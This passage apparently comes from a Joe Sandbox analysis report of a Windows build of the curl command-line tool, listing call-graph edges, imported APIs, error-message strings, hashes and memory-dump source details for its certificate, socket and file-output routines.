32503 7ff7f1db6398 32502->32503 32503->32499 32504->32399 32505->32474 32507 7ff7f1db1f09 32506->32507 32512 7ff7f1db1f8e 32506->32512 32508 7ff7f1db1f7e 32507->32508 32509 7ff7f1da4f70 __swprintf_l 15 API calls 32507->32509 32510 7ff7f1deaf80 __swprintf_l 8 API calls 32508->32510 32511 7ff7f1db1f54 32509->32511 32510->32512 32513 7ff7f1db1f69 32511->32513 32514 7ff7f1db1f97 32511->32514 32512->32472 32518 7ff7f1db27e8 fwrite fwrite 32513->32518 32519 7ff7f1deb0b4 8 API calls 32514->32519 32517 7ff7f1db1f9c 32518->32508 32519->32517 32520->32479 32522 7ff7f1dbfc51 32521->32522 32528 7ff7f1dbfb46 32521->32528 32523 7ff7f1deaf80 __swprintf_l 8 API calls 32522->32523 32524 7ff7f1dbfc60 32523->32524 32524->32485 32525 7ff7f1dbfb8d 32526 7ff7f1db67dc 124 API calls 32525->32526 32526->32522 32528->32525 32562 7ff7f1db73b8 32528->32562 32530 7ff7f1daaf9c 32529->32530 32531 7ff7f1daaeb9 32529->32531 32534 7ff7f1deaf80 __swprintf_l 8 API calls 32530->32534 32532 7ff7f1daaed6 32531->32532 32533 7ff7f1daaeca 32531->32533 32535 7ff7f1dbecd8 8 API calls 32532->32535 32659 7ff7f1dbefb0 36 API calls 32533->32659 32537 7ff7f1daafc4 32534->32537 32540 7ff7f1daaee2 32535->32540 32537->32484 32538 7ff7f1daaed4 32538->32540 32539 7ff7f1daaf60 32655 7ff7f1dadc64 32539->32655 32540->32539 32650 7ff7f1dc6618 32540->32650 32543 7ff7f1daaf75 32544 7ff7f1dab4a0 21 API calls 32543->32544 32546 7ff7f1daaf93 32544->32546 32545 7ff7f1dab01c _time64 32547 7ff7f1dab053 __swprintf_l 32545->32547 32546->32530 32546->32545 32546->32547 32548 7ff7f1dab21f 32547->32548 32549 7ff7f1dab10e 32547->32549 32552 7ff7f1db73b8 60 API calls 32548->32552 32550 7ff7f1da4fc8 __swprintf_l 15 API calls 32549->32550 32551 7ff7f1dab16d 32550->32551 32660 7ff7f1dcbdf4 32551->32660 32552->32530 32554 7ff7f1dab1f4 32554->32530 32555 7ff7f1db1f00 21 API calls 32554->32555 32555->32530 32556 7ff7f1dab1aa 32556->32554 32557 7ff7f1db1f00 21 API calls 32556->32557 32558 7ff7f1dab1d6 32557->32558 32664 7ff7f1dbf9d0 QueryPerformanceCounter GetTickCount __swprintf_l 32558->32664 32560 7ff7f1dab1de 32560->32554 32561 7ff7f1db73b8 60 API calls 32560->32561 32561->32554 32563 7ff7f1db73e0 32562->32563 32567 7ff7f1db746a 32563->32567 32568 7ff7f1db7044 32563->32568 32566 7ff7f1dab4a0 21 API calls 32566->32567 32567->32528 32569 7ff7f1db1f00 21 API calls 32568->32569 32570 7ff7f1db7064 32569->32570 32585 7ff7f1dbecd8 32570->32585 32575 7ff7f1dbd4bc 51 API calls 32576 7ff7f1db70d7 32575->32576 32577 7ff7f1db70ef 32576->32577 32578 7ff7f1db4190 closesocket 32576->32578 32579 7ff7f1db7107 32577->32579 32599 7ff7f1db4190 32577->32599 32578->32577 32581 7ff7f1db711f 32579->32581 32582 7ff7f1db4190 closesocket 32579->32582 32583 7ff7f1db7137 32581->32583 32584 7ff7f1db4190 closesocket 32581->32584 32582->32581 32583->32566 32584->32583 32586 7ff7f1db70b8 32585->32586 32587 7ff7f1dbed00 EnterCriticalSection LeaveCriticalSection 32585->32587 32595 7ff7f1dbd4bc 32586->32595 32588 7ff7f1dbed2f CloseHandle 32587->32588 32589 7ff7f1dbed37 32587->32589 32594 7ff7f1dbed5d 32588->32594 32590 7ff7f1dbed55 32589->32590 32591 7ff7f1dbed3c WaitForSingleObjectEx CloseHandle 32589->32591 32603 7ff7f1dbe838 DeleteCriticalSection closesocket 32590->32603 32591->32590 32593 7ff7f1dbed79 closesocket 32593->32586 32594->32593 32604 7ff7f1ddf280 32595->32604 32609 7ff7f1dbd4fc 32595->32609 32596 7ff7f1db70c6 32596->32575 32600 7ff7f1db41d5 closesocket 32599->32600 32601 7ff7f1db41ad 32599->32601 32602 7ff7f1db41e0 32600->32602 32601->32600 32601->32602 32602->32579 32605 7ff7f1ddf295 32604->32605 32606 7ff7f1dbd4fc 32604->32606 32605->32605 32612 7ff7f1ddef80 32606->32612 32611 7ff7f1ddef80 51 API calls 32609->32611 32610 7ff7f1dbd520 32610->32596 32611->32610 32613 7ff7f1ddefc1 32612->32613 32614 7ff7f1db1f00 21 API calls 32613->32614 32615 7ff7f1ddf017 32613->32615 32614->32615 32616 7ff7f1ddf190 32615->32616 32619 7ff7f1ddf0a8 32615->32619 32631 7ff7f1daeb80 24 API calls __swprintf_l 32615->32631 32622 7ff7f1ddf1ec 32616->32622 32633 7ff7f1ddef30 free 32616->32633 32618 7ff7f1deaf80 __swprintf_l 8 API calls 32620 7ff7f1dbd520 32618->32620 32619->32616 32628 7ff7f1db22b4 32619->32628 32620->32596 32622->32618 32623 7ff7f1ddf096 32632 7ff7f1db1fa0 21 API calls __swprintf_l 32623->32632 32626 7ff7f1ddf14c 32626->32616 32627 7ff7f1db1f00 21 API calls 32626->32627 32627->32616 32634 7ff7f1db20e0 32628->32634 32631->32623 32632->32619 32633->32622 32635 7ff7f1db2155 32634->32635 32636 7ff7f1db221e send 32634->32636 32635->32636 32641 7ff7f1dc6138 15 API calls 32635->32641 32637 7ff7f1db223c WSAGetLastError 32636->32637 32639 7ff7f1db224b 32636->32639 32638 7ff7f1db2261 32637->32638 32637->32639 32640 7ff7f1dae9c8 27 API calls 32638->32640 32642 7ff7f1deaf80 __swprintf_l 8 API calls 32639->32642 32643 7ff7f1db226d 32640->32643 32647 7ff7f1db218c 32641->32647 32644 7ff7f1db229f 32642->32644 32645 7ff7f1db1fa0 21 API calls 32643->32645 32644->32626 32645->32639 32646 7ff7f1db21f5 recv 32646->32636 32648 7ff7f1db2216 32646->32648 32647->32636 32647->32639 32647->32646 32649 7ff7f1db21db 32647->32649 32648->32636 32649->32646 32665 7ff7f1dc6ef8 32650->32665 32652 7ff7f1dc6656 32652->32539 32654 7ff7f1da511c 15 API calls 32654->32652 32656 7ff7f1dadcab 32655->32656 32657 7ff7f1dadc7f 32655->32657 32656->32543 32719 7ff7f1dad9d0 23 API calls __swprintf_l 32657->32719 32659->32538 32661 7ff7f1dcbe34 GetTickCount 32660->32661 32662 7ff7f1dcbe06 QueryPerformanceCounter 32660->32662 32663 7ff7f1dcbe5b 32661->32663 32662->32663 32663->32556 32664->32560 32666 7ff7f1dcbdf4 __swprintf_l 2 API calls 32665->32666 32670 7ff7f1dc6f14 32666->32670 32667 7ff7f1dc662e 32667->32652 32667->32654 32668 7ff7f1dc7064 32668->32667 32673 7ff7f1dc6b98 32668->32673 32670->32667 32670->32668 32671 7ff7f1dc6fd2 32670->32671 32671->32667 32701 7ff7f1db1fa0 21 API calls __swprintf_l 32671->32701 32674 7ff7f1dc6c0d 32673->32674 32679 7ff7f1dc6c3f 32673->32679 32675 7ff7f1dc6c2c 32674->32675 32676 7ff7f1da511c 15 API calls 32674->32676 32677 7ff7f1da511c 15 API calls 32675->32677 32676->32675 32677->32679 32702 7ff7f1da0e0c 32679->32702 32680 7ff7f1dc6d4b 32681 7ff7f1da0e0c 15 API calls 32680->32681 32682 7ff7f1dc6d57 32681->32682 32683 7ff7f1da0e0c 15 API calls 32682->32683 32684 7ff7f1dc6d63 32683->32684 32712 7ff7f1da0c74 32684->32712 32687 7ff7f1da0c74 15 API calls 32688 7ff7f1dc6e0d 32687->32688 32689 7ff7f1da0c74 15 API calls 32688->32689 32690 7ff7f1dc6e20 32689->32690 32691 7ff7f1da0c74 15 API calls 32690->32691 32692 7ff7f1dc6e33 32691->32692 32693 7ff7f1da0c74 15 API calls 32692->32693 32694 7ff7f1dc6e46 32693->32694 32695 7ff7f1da0c74 15 API calls 32694->32695 32696 7ff7f1dc6e5a 32695->32696 32697 7ff7f1da511c 15 API calls 32696->32697 32698 7ff7f1dc6ebb fflush 32697->32698 32699 7ff7f1deaf80 __swprintf_l 8 API calls 32698->32699 32700 7ff7f1dc6ed4 32699->32700 32700->32667 32701->32667 32703 7ff7f1da0e35 32702->32703 32704 7ff7f1da0e1b 32702->32704 32705 7ff7f1da0e58 32703->32705 32708 7ff7f1da0eb4 32703->32708 32704->32680 32706 7ff7f1da4fc8 __swprintf_l 15 API calls 32705->32706 32709 7ff7f1da0eaf 32706->32709 32707 7ff7f1da0f11 32708->32707 32710 7ff7f1da4fc8 __swprintf_l 15 API calls 32708->32710 32709->32680 32711 7ff7f1da0f0c 32710->32711 32711->32680 32716 7ff7f1da0c95 32712->32716 32717 7ff7f1da0c89 32712->32717 32713 7ff7f1da4fc8 __swprintf_l 15 API calls 32715 7ff7f1da0d4f 32713->32715 32714 7ff7f1da0cb7 32718 7ff7f1da4fc8 __swprintf_l 15 API calls 32714->32718 32715->32687 32716->32714 32716->32717 32717->32713 32718->32715 32719->32656 32720->32496 32721->32501 34744 7ff7f1d9b6c9 100 API calls __swprintf_l 34745 7ff7f1d9b6c9 179 API calls 2 library calls 34746 7ff7f1d94150 25 API calls __swprintf_l 34747 7ff7f1d92350 53 API calls __swprintf_l 34748 7ff7f1d9b34f 28 API calls __swprintf_l 34749 7ff7f1dd8350 190 API calls __swprintf_l 34752 7ff7f1dd1750 160 API calls __swprintf_l 34755 7ff7f1da6320 fopen fread 34761 7ff7f1db7730 30 API calls 34764 7ff7f1dd8f30 36 API calls __swprintf_l 34765 7ff7f1dce930 163 API calls
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: Cert$Store$free$Certificate$ErrorLast$CloseContextFindFree_mbschrfseek$BinaryByteCharCryptImportMultiOpenStringWide_mbsnbcmp_strdupfclosefopenfreadftell
                            • String ID: (memory blob)$Microsoft Unified Security Protocol Provider$P12$SSL versions not supported$Unable to set ciphers to passed via SSL_CONN_CONFIG$Unrecognized parameter passed via CURLOPT_SSLVERSION$schannel: AcquireCredentialsHandle failed: %s$schannel: Failed to get certificate from file %s, last error is 0x%x$schannel: Failed to get certificate location or file for %s$schannel: Failed to import cert file %s, last error is 0x%x$schannel: Failed to import cert file %s, password is bad$schannel: Failed to open cert store %x %s, last error is 0x%x$schannel: Failed to read cert file %s$schannel: certificate format compatibility error for %s$schannel: disabled automatic use of client certificate$schannel: enabled automatic use of client certificate$schannel: unable to allocate memory
                            • API String ID: 1231573371-2016555727
                            • Opcode ID: 1430246b4e4cbeb4b7d061ab38bc49f463022b2ac335cc07986ed133e16f4c5b
                            • Instruction ID: 515220b3efa46f4eedc50d2ccd4bd5f8b31c7235c8e768421bfd0ac007d03607
                            • Opcode Fuzzy Hash: 1430246b4e4cbeb4b7d061ab38bc49f463022b2ac335cc07986ed133e16f4c5b
                            • Instruction Fuzzy Hash: CE328432A08B4281EB28EB25A4502B9B7B1FF88BD5F844135D96E477D4DFBCE445C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9AA14
                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9AA72
                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9AA8D
                            • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9ABAA
                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9AE1C
                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9AE32
                            • _unlink.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FF7F1D9AE7C
                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 00007FF7F1D9AED0
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 00007FF7F1D9AF09
                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9AFB1
                            • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9AFBF
                            • _get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9AFC8
                            • _lseeki64.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9AFD9
                            • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7F1D9AFE9
                            • fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9AFFD
                            • CreateFileA.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7F1D9B06E
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9B080
                            • SetFileTime.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7F1D9B0BB
                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1D9B0C5
                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7F1D9B0E4
                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1D9B0EC
                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9B133
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9B149
                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9B16C
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7F1D9B182
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7F1D9B1B0
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7F1D9B1BA
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7F1D9B1C4
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7F1D9B1D1
                            Strings
                            • curl: (%d) %s, xrefs: 00007FF7F1D9AA50
                            • curl: (23) Failed to truncate file, xrefs: 00007FF7F1D9B032
                            • Failed to set filetime %I64d on outfile: SetFileTime failed: GetLastError %u, xrefs: 00007FF7F1D9B0CE
                            • The Retry-After: time would make this command line exceed the maximum allowed time for retries., xrefs: 00007FF7F1D9ADF5
                            • Throwing away %I64d bytes, xrefs: 00007FF7F1D9AFA1
                            • curl: (%d) The requested URL returned error: %ld, xrefs: 00007FF7F1D9AB6C
                            • curl: (23) Failed seeking to end of file, xrefs: 00007FF7F1D9B00C
                            • Removing output file: %s, xrefs: 00007FF7F1D9AE6A
                            • More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo, xrefs: 00007FF7F1D9AA6B
                            • Problem %s. Will retry in %ld seconds. %ld retries left., xrefs: 00007FF7F1D9AF47
                            • Failed to set filetime %I64d on outfile: CreateFile failed: GetLastError %u, xrefs: 00007FF7F1D9B0F5
                            • Failed to set filetime %I64d on outfile: overflow, xrefs: 00007FF7F1D9AEEE
                            • curl: (%d) Failed writing body, xrefs: 00007FF7F1D9AAA7, 00007FF7F1D9AE51
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: free$Filefclose$ErrorLast_filenofflushfputs$CloseCreateHandleTime_close_get_osfhandle_lseeki64_strdup_unlinkfseek
                            • String ID: Failed to set filetime %I64d on outfile: CreateFile failed: GetLastError %u$Failed to set filetime %I64d on outfile: SetFileTime failed: GetLastError %u$Failed to set filetime %I64d on outfile: overflow$More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo$Problem %s. Will retry in %ld seconds. %ld retries left.$Removing output file: %s$The Retry-After: time would make this command line exceed the maximum allowed time for retries.$Throwing away %I64d bytes$curl: (%d) %s$curl: (%d) Failed writing body$curl: (%d) The requested URL returned error: %ld$curl: (23) Failed seeking to end of file$curl: (23) Failed to truncate file
                            • API String ID: 1498925360-3108001027
                            • Opcode ID: 550d12ecdff56ceaef0a23f6c9dc6bec3d1a7229724391212ac4868aca746547
                            • Instruction ID: 5a2758a892ac8450df2749bd9d006d8f8ea725c68eb716c6892edc01412e615c
                            • Opcode Fuzzy Hash: 550d12ecdff56ceaef0a23f6c9dc6bec3d1a7229724391212ac4868aca746547
                            • Instruction Fuzzy Hash: A132DD62A0965686FB68EB25C4447B8B3B0FF44784FC58536CA2D0B6D5DFBCE840C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 842 7ff7f1da0658-7ff7f1da068c 843 7ff7f1da068e-7ff7f1da06a3 call 7ff7f1d93cd4 842->843 844 7ff7f1da070d-7ff7f1da070f 842->844 853 7ff7f1da06d3-7ff7f1da06e9 call 7ff7f1da0590 843->853 854 7ff7f1da06a5-7ff7f1da06bb fopen 843->854 845 7ff7f1da0720-7ff7f1da0727 fopen 844->845 846 7ff7f1da0711-7ff7f1da0714 844->846 849 7ff7f1da072d-7ff7f1da0733 845->849 846->845 848 7ff7f1da0716-7ff7f1da071e __acrt_iob_func 846->848 848->849 851 7ff7f1da0ba2 849->851 852 7ff7f1da0739-7ff7f1da0744 849->852 859 7ff7f1da0ba5 851->859 855 7ff7f1da074c-7ff7f1da0766 call 7ff7f1da0bc8 852->855 865 7ff7f1da0707-7ff7f1da070b 853->865 866 7ff7f1da06eb-7ff7f1da0701 call 7ff7f1da0590 853->866 856 7ff7f1da06ce-7ff7f1da06d1 854->856 857 7ff7f1da06bd-7ff7f1da06c9 free 854->857 868 7ff7f1da0b7c-7ff7f1da0b90 free __acrt_iob_func 855->868 869 7ff7f1da076c-7ff7f1da077f 855->869 856->852 862 7ff7f1da0bb7-7ff7f1da0bc7 857->862 860 7ff7f1da0bab-7ff7f1da0bb4 free 859->860 860->862 865->852 866->851 866->865 871 7ff7f1da0b92-7ff7f1da0b95 fclose 868->871 872 7ff7f1da0b9b-7ff7f1da0b9e 868->872 873 7ff7f1da0b74-7ff7f1da0b7a 869->873 874 7ff7f1da0785-7ff7f1da078b 869->874 871->872 872->860 875 7ff7f1da0ba0 872->875 873->868 876 7ff7f1da07bc-7ff7f1da07c0 874->876 877 7ff7f1da078d 874->877 875->859 878 7ff7f1da07c2-7ff7f1da07d0 876->878 879 7ff7f1da07e5-7ff7f1da07f3 876->879 880 7ff7f1da0790-7ff7f1da0798 877->880 878->879 882 7ff7f1da07d2-7ff7f1da07d8 878->882 883 7ff7f1da07f8-7ff7f1da07fc 879->883 880->876 881 7ff7f1da079a-7ff7f1da07ac 880->881 881->876 884 7ff7f1da07ae-7ff7f1da07ba 881->884 882->855 885 7ff7f1da07de-7ff7f1da07e0 882->885 886 7ff7f1da0814-7ff7f1da0817 883->886 887 7ff7f1da07fe-7ff7f1da0812 883->887 884->876 884->880 885->855 889 7ff7f1da0828-7ff7f1da0834 886->889 890 7ff7f1da0819-7ff7f1da0820 886->890 887->886 888 7ff7f1da0836-7ff7f1da0838 887->888 892 7ff7f1da083a-7ff7f1da0844 888->892 893 7ff7f1da088c-7ff7f1da088f 888->893 889->883 889->888 890->888 891 7ff7f1da0822-7ff7f1da0826 890->891 891->888 891->889 892->893 896 7ff7f1da0846-7ff7f1da0849 892->896 894 7ff7f1da0891-7ff7f1da0894 893->894 895 7ff7f1da090b-7ff7f1da0910 893->895 898 7ff7f1da0898-7ff7f1da089f 894->898 899 7ff7f1da0916 895->899 900 7ff7f1da09aa 895->900 897 7ff7f1da0850-7ff7f1da0854 896->897 901 7ff7f1da0856-7ff7f1da0866 897->901 902 7ff7f1da0868-7ff7f1da086e 897->902 898->898 903 7ff7f1da08a1-7ff7f1da08b3 malloc 898->903 905 7ff7f1da091d-7ff7f1da0920 899->905 904 7ff7f1da09ae-7ff7f1da09b5 900->904 901->902 906 7ff7f1da087c-7ff7f1da0886 901->906 907 7ff7f1da0870-7ff7f1da0874 902->907 908 7ff7f1da0888 902->908 903->873 909 7ff7f1da08b9-7ff7f1da08c0 903->909 910 7ff7f1da09b8-7ff7f1da09e6 call 7ff7f1d95b58 904->910 911 7ff7f1da092f-7ff7f1da0936 905->911 912 7ff7f1da0922-7ff7f1da092d 905->912 906->897 906->908 907->906 914 7ff7f1da0876-7ff7f1da087a 907->914 908->893 915 7ff7f1da08f9-7ff7f1da08fd 909->915 921 7ff7f1da09e8-7ff7f1da09eb 910->921 922 7ff7f1da0a0c-7ff7f1da0a0f 910->922 911->905 913 7ff7f1da0938-7ff7f1da093e 911->913 912->911 912->913 913->900 917 7ff7f1da0940-7ff7f1da094a 913->917 914->906 914->908 918 7ff7f1da08ff-7ff7f1da0906 915->918 919 7ff7f1da08c2-7ff7f1da08c4 915->919 923 7ff7f1da0972-7ff7f1da0974 917->923 924 7ff7f1da094c 917->924 918->910 919->918 925 7ff7f1da08c6-7ff7f1da08cb 919->925 926 7ff7f1da0b4f 921->926 927 7ff7f1da09f1-7ff7f1da09f4 921->927 929 7ff7f1da0a15-7ff7f1da0a21 922->929 930 7ff7f1da0afa-7ff7f1da0b00 922->930 931 7ff7f1da0986-7ff7f1da09a8 call 7ff7f1d9a780 923->931 932 7ff7f1da0976-7ff7f1da0984 923->932 928 7ff7f1da094e-7ff7f1da0953 924->928 933 7ff7f1da08f4-7ff7f1da08f6 925->933 934 7ff7f1da08cd-7ff7f1da08d1 925->934 936 7ff7f1da0b51-7ff7f1da0b54 926->936 927->926 935 7ff7f1da09fa-7ff7f1da09fe 927->935 928->923 937 7ff7f1da0955-7ff7f1da0965 928->937 929->936 938 7ff7f1da0a27-7ff7f1da0a2b 929->938 940 7ff7f1da0b02-7ff7f1da0b0a 930->940 941 7ff7f1da0b0c-7ff7f1da0b22 930->941 931->904 932->900 932->931 933->915 934->918 942 7ff7f1da08d3-7ff7f1da08d5 934->942 935->926 945 7ff7f1da0a04-7ff7f1da0a07 935->945 946 7ff7f1da0b5f-7ff7f1da0b63 936->946 947 7ff7f1da0b56-7ff7f1da0b59 free 936->947 937->923 948 7ff7f1da0967-7ff7f1da0970 937->948 938->936 949 7ff7f1da0a31-7ff7f1da0a4c malloc 938->949 940->941 941->926 951 7ff7f1da0b24-7ff7f1da0b4a call 7ff7f1d99fe8 call 7ff7f1d9a780 941->951 943 7ff7f1da08ef 942->943 944 7ff7f1da08d7-7ff7f1da08d9 942->944 955 7ff7f1da08f1 943->955 953 7ff7f1da08eb-7ff7f1da08ed 944->953 954 7ff7f1da08db-7ff7f1da08dd 944->954 945->930 956 7ff7f1da0b65-7ff7f1da0b69 946->956 957 7ff7f1da0b6b-7ff7f1da0b6f 946->957 947->946 948->923 948->928 958 7ff7f1da0a52-7ff7f1da0aef call 7ff7f1dec350 949->958 959 7ff7f1da0af1-7ff7f1da0af5 949->959 951->926 953->955 961 7ff7f1da08df-7ff7f1da08e1 954->961 962 7ff7f1da08e7-7ff7f1da08e9 954->962 955->933 956->957 957->855 958->926 959->930 961->955 965 7ff7f1da08e3-7ff7f1da08e5 961->965 962->955 965->955
                            APIs
                            • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?,?,0000000A,?,00007FF7F1D9843C), ref: 00007FF7F1DA06AF
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?,?,0000000A,?,00007FF7F1D9843C), ref: 00007FF7F1DA06C0
                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?,?,0000000A,?,00007FF7F1D9843C), ref: 00007FF7F1DA0718
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?), ref: 00007FF7F1DA08A4
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?), ref: 00007FF7F1DA0A36
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?), ref: 00007FF7F1DA0B59
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: freemalloc$__acrt_iob_funcfopen
                            • String ID: %s:%d: warning: '%s' %s$%s:%d: warning: '%s' uses unquoted whitespace in the line that may cause side-effects!$.curlrc$<stdin>$_curlrc
                            • API String ID: 2533209365-1529230327
                            • Opcode ID: 41bbc969c998eaa1a6a2ab3b034595165a186059a2c17a1db967d8fbf99a17b5
                            • Instruction ID: 98e408af58c644b8c471f4b6e3a002e94ce457b42e18eb5d159ef41f2a7cca2d
                            • Opcode Fuzzy Hash: 41bbc969c998eaa1a6a2ab3b034595165a186059a2c17a1db967d8fbf99a17b5
                            • Instruction Fuzzy Hash: 61F10521A0978345FB55EF3594502BCABB1AF05B88FC84539CA6D077C6DFBEA405C3A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: closesocket$getsocknamesocket$acceptbindconnectgetpeernamehtonlioctlsocketlistensetsockopt
                            • String ID:
                            • API String ID: 2616969812-0
                            • Opcode ID: 11dc6249568054a819cfb97c0cc03107cb4d38a56a3acac441991cfccc9ffb05
                            • Instruction ID: 8fb68997730b3bc8996524b24f3094f28106318229448bc3c53507c215b6b019
                            • Opcode Fuzzy Hash: 11dc6249568054a819cfb97c0cc03107cb4d38a56a3acac441991cfccc9ffb05
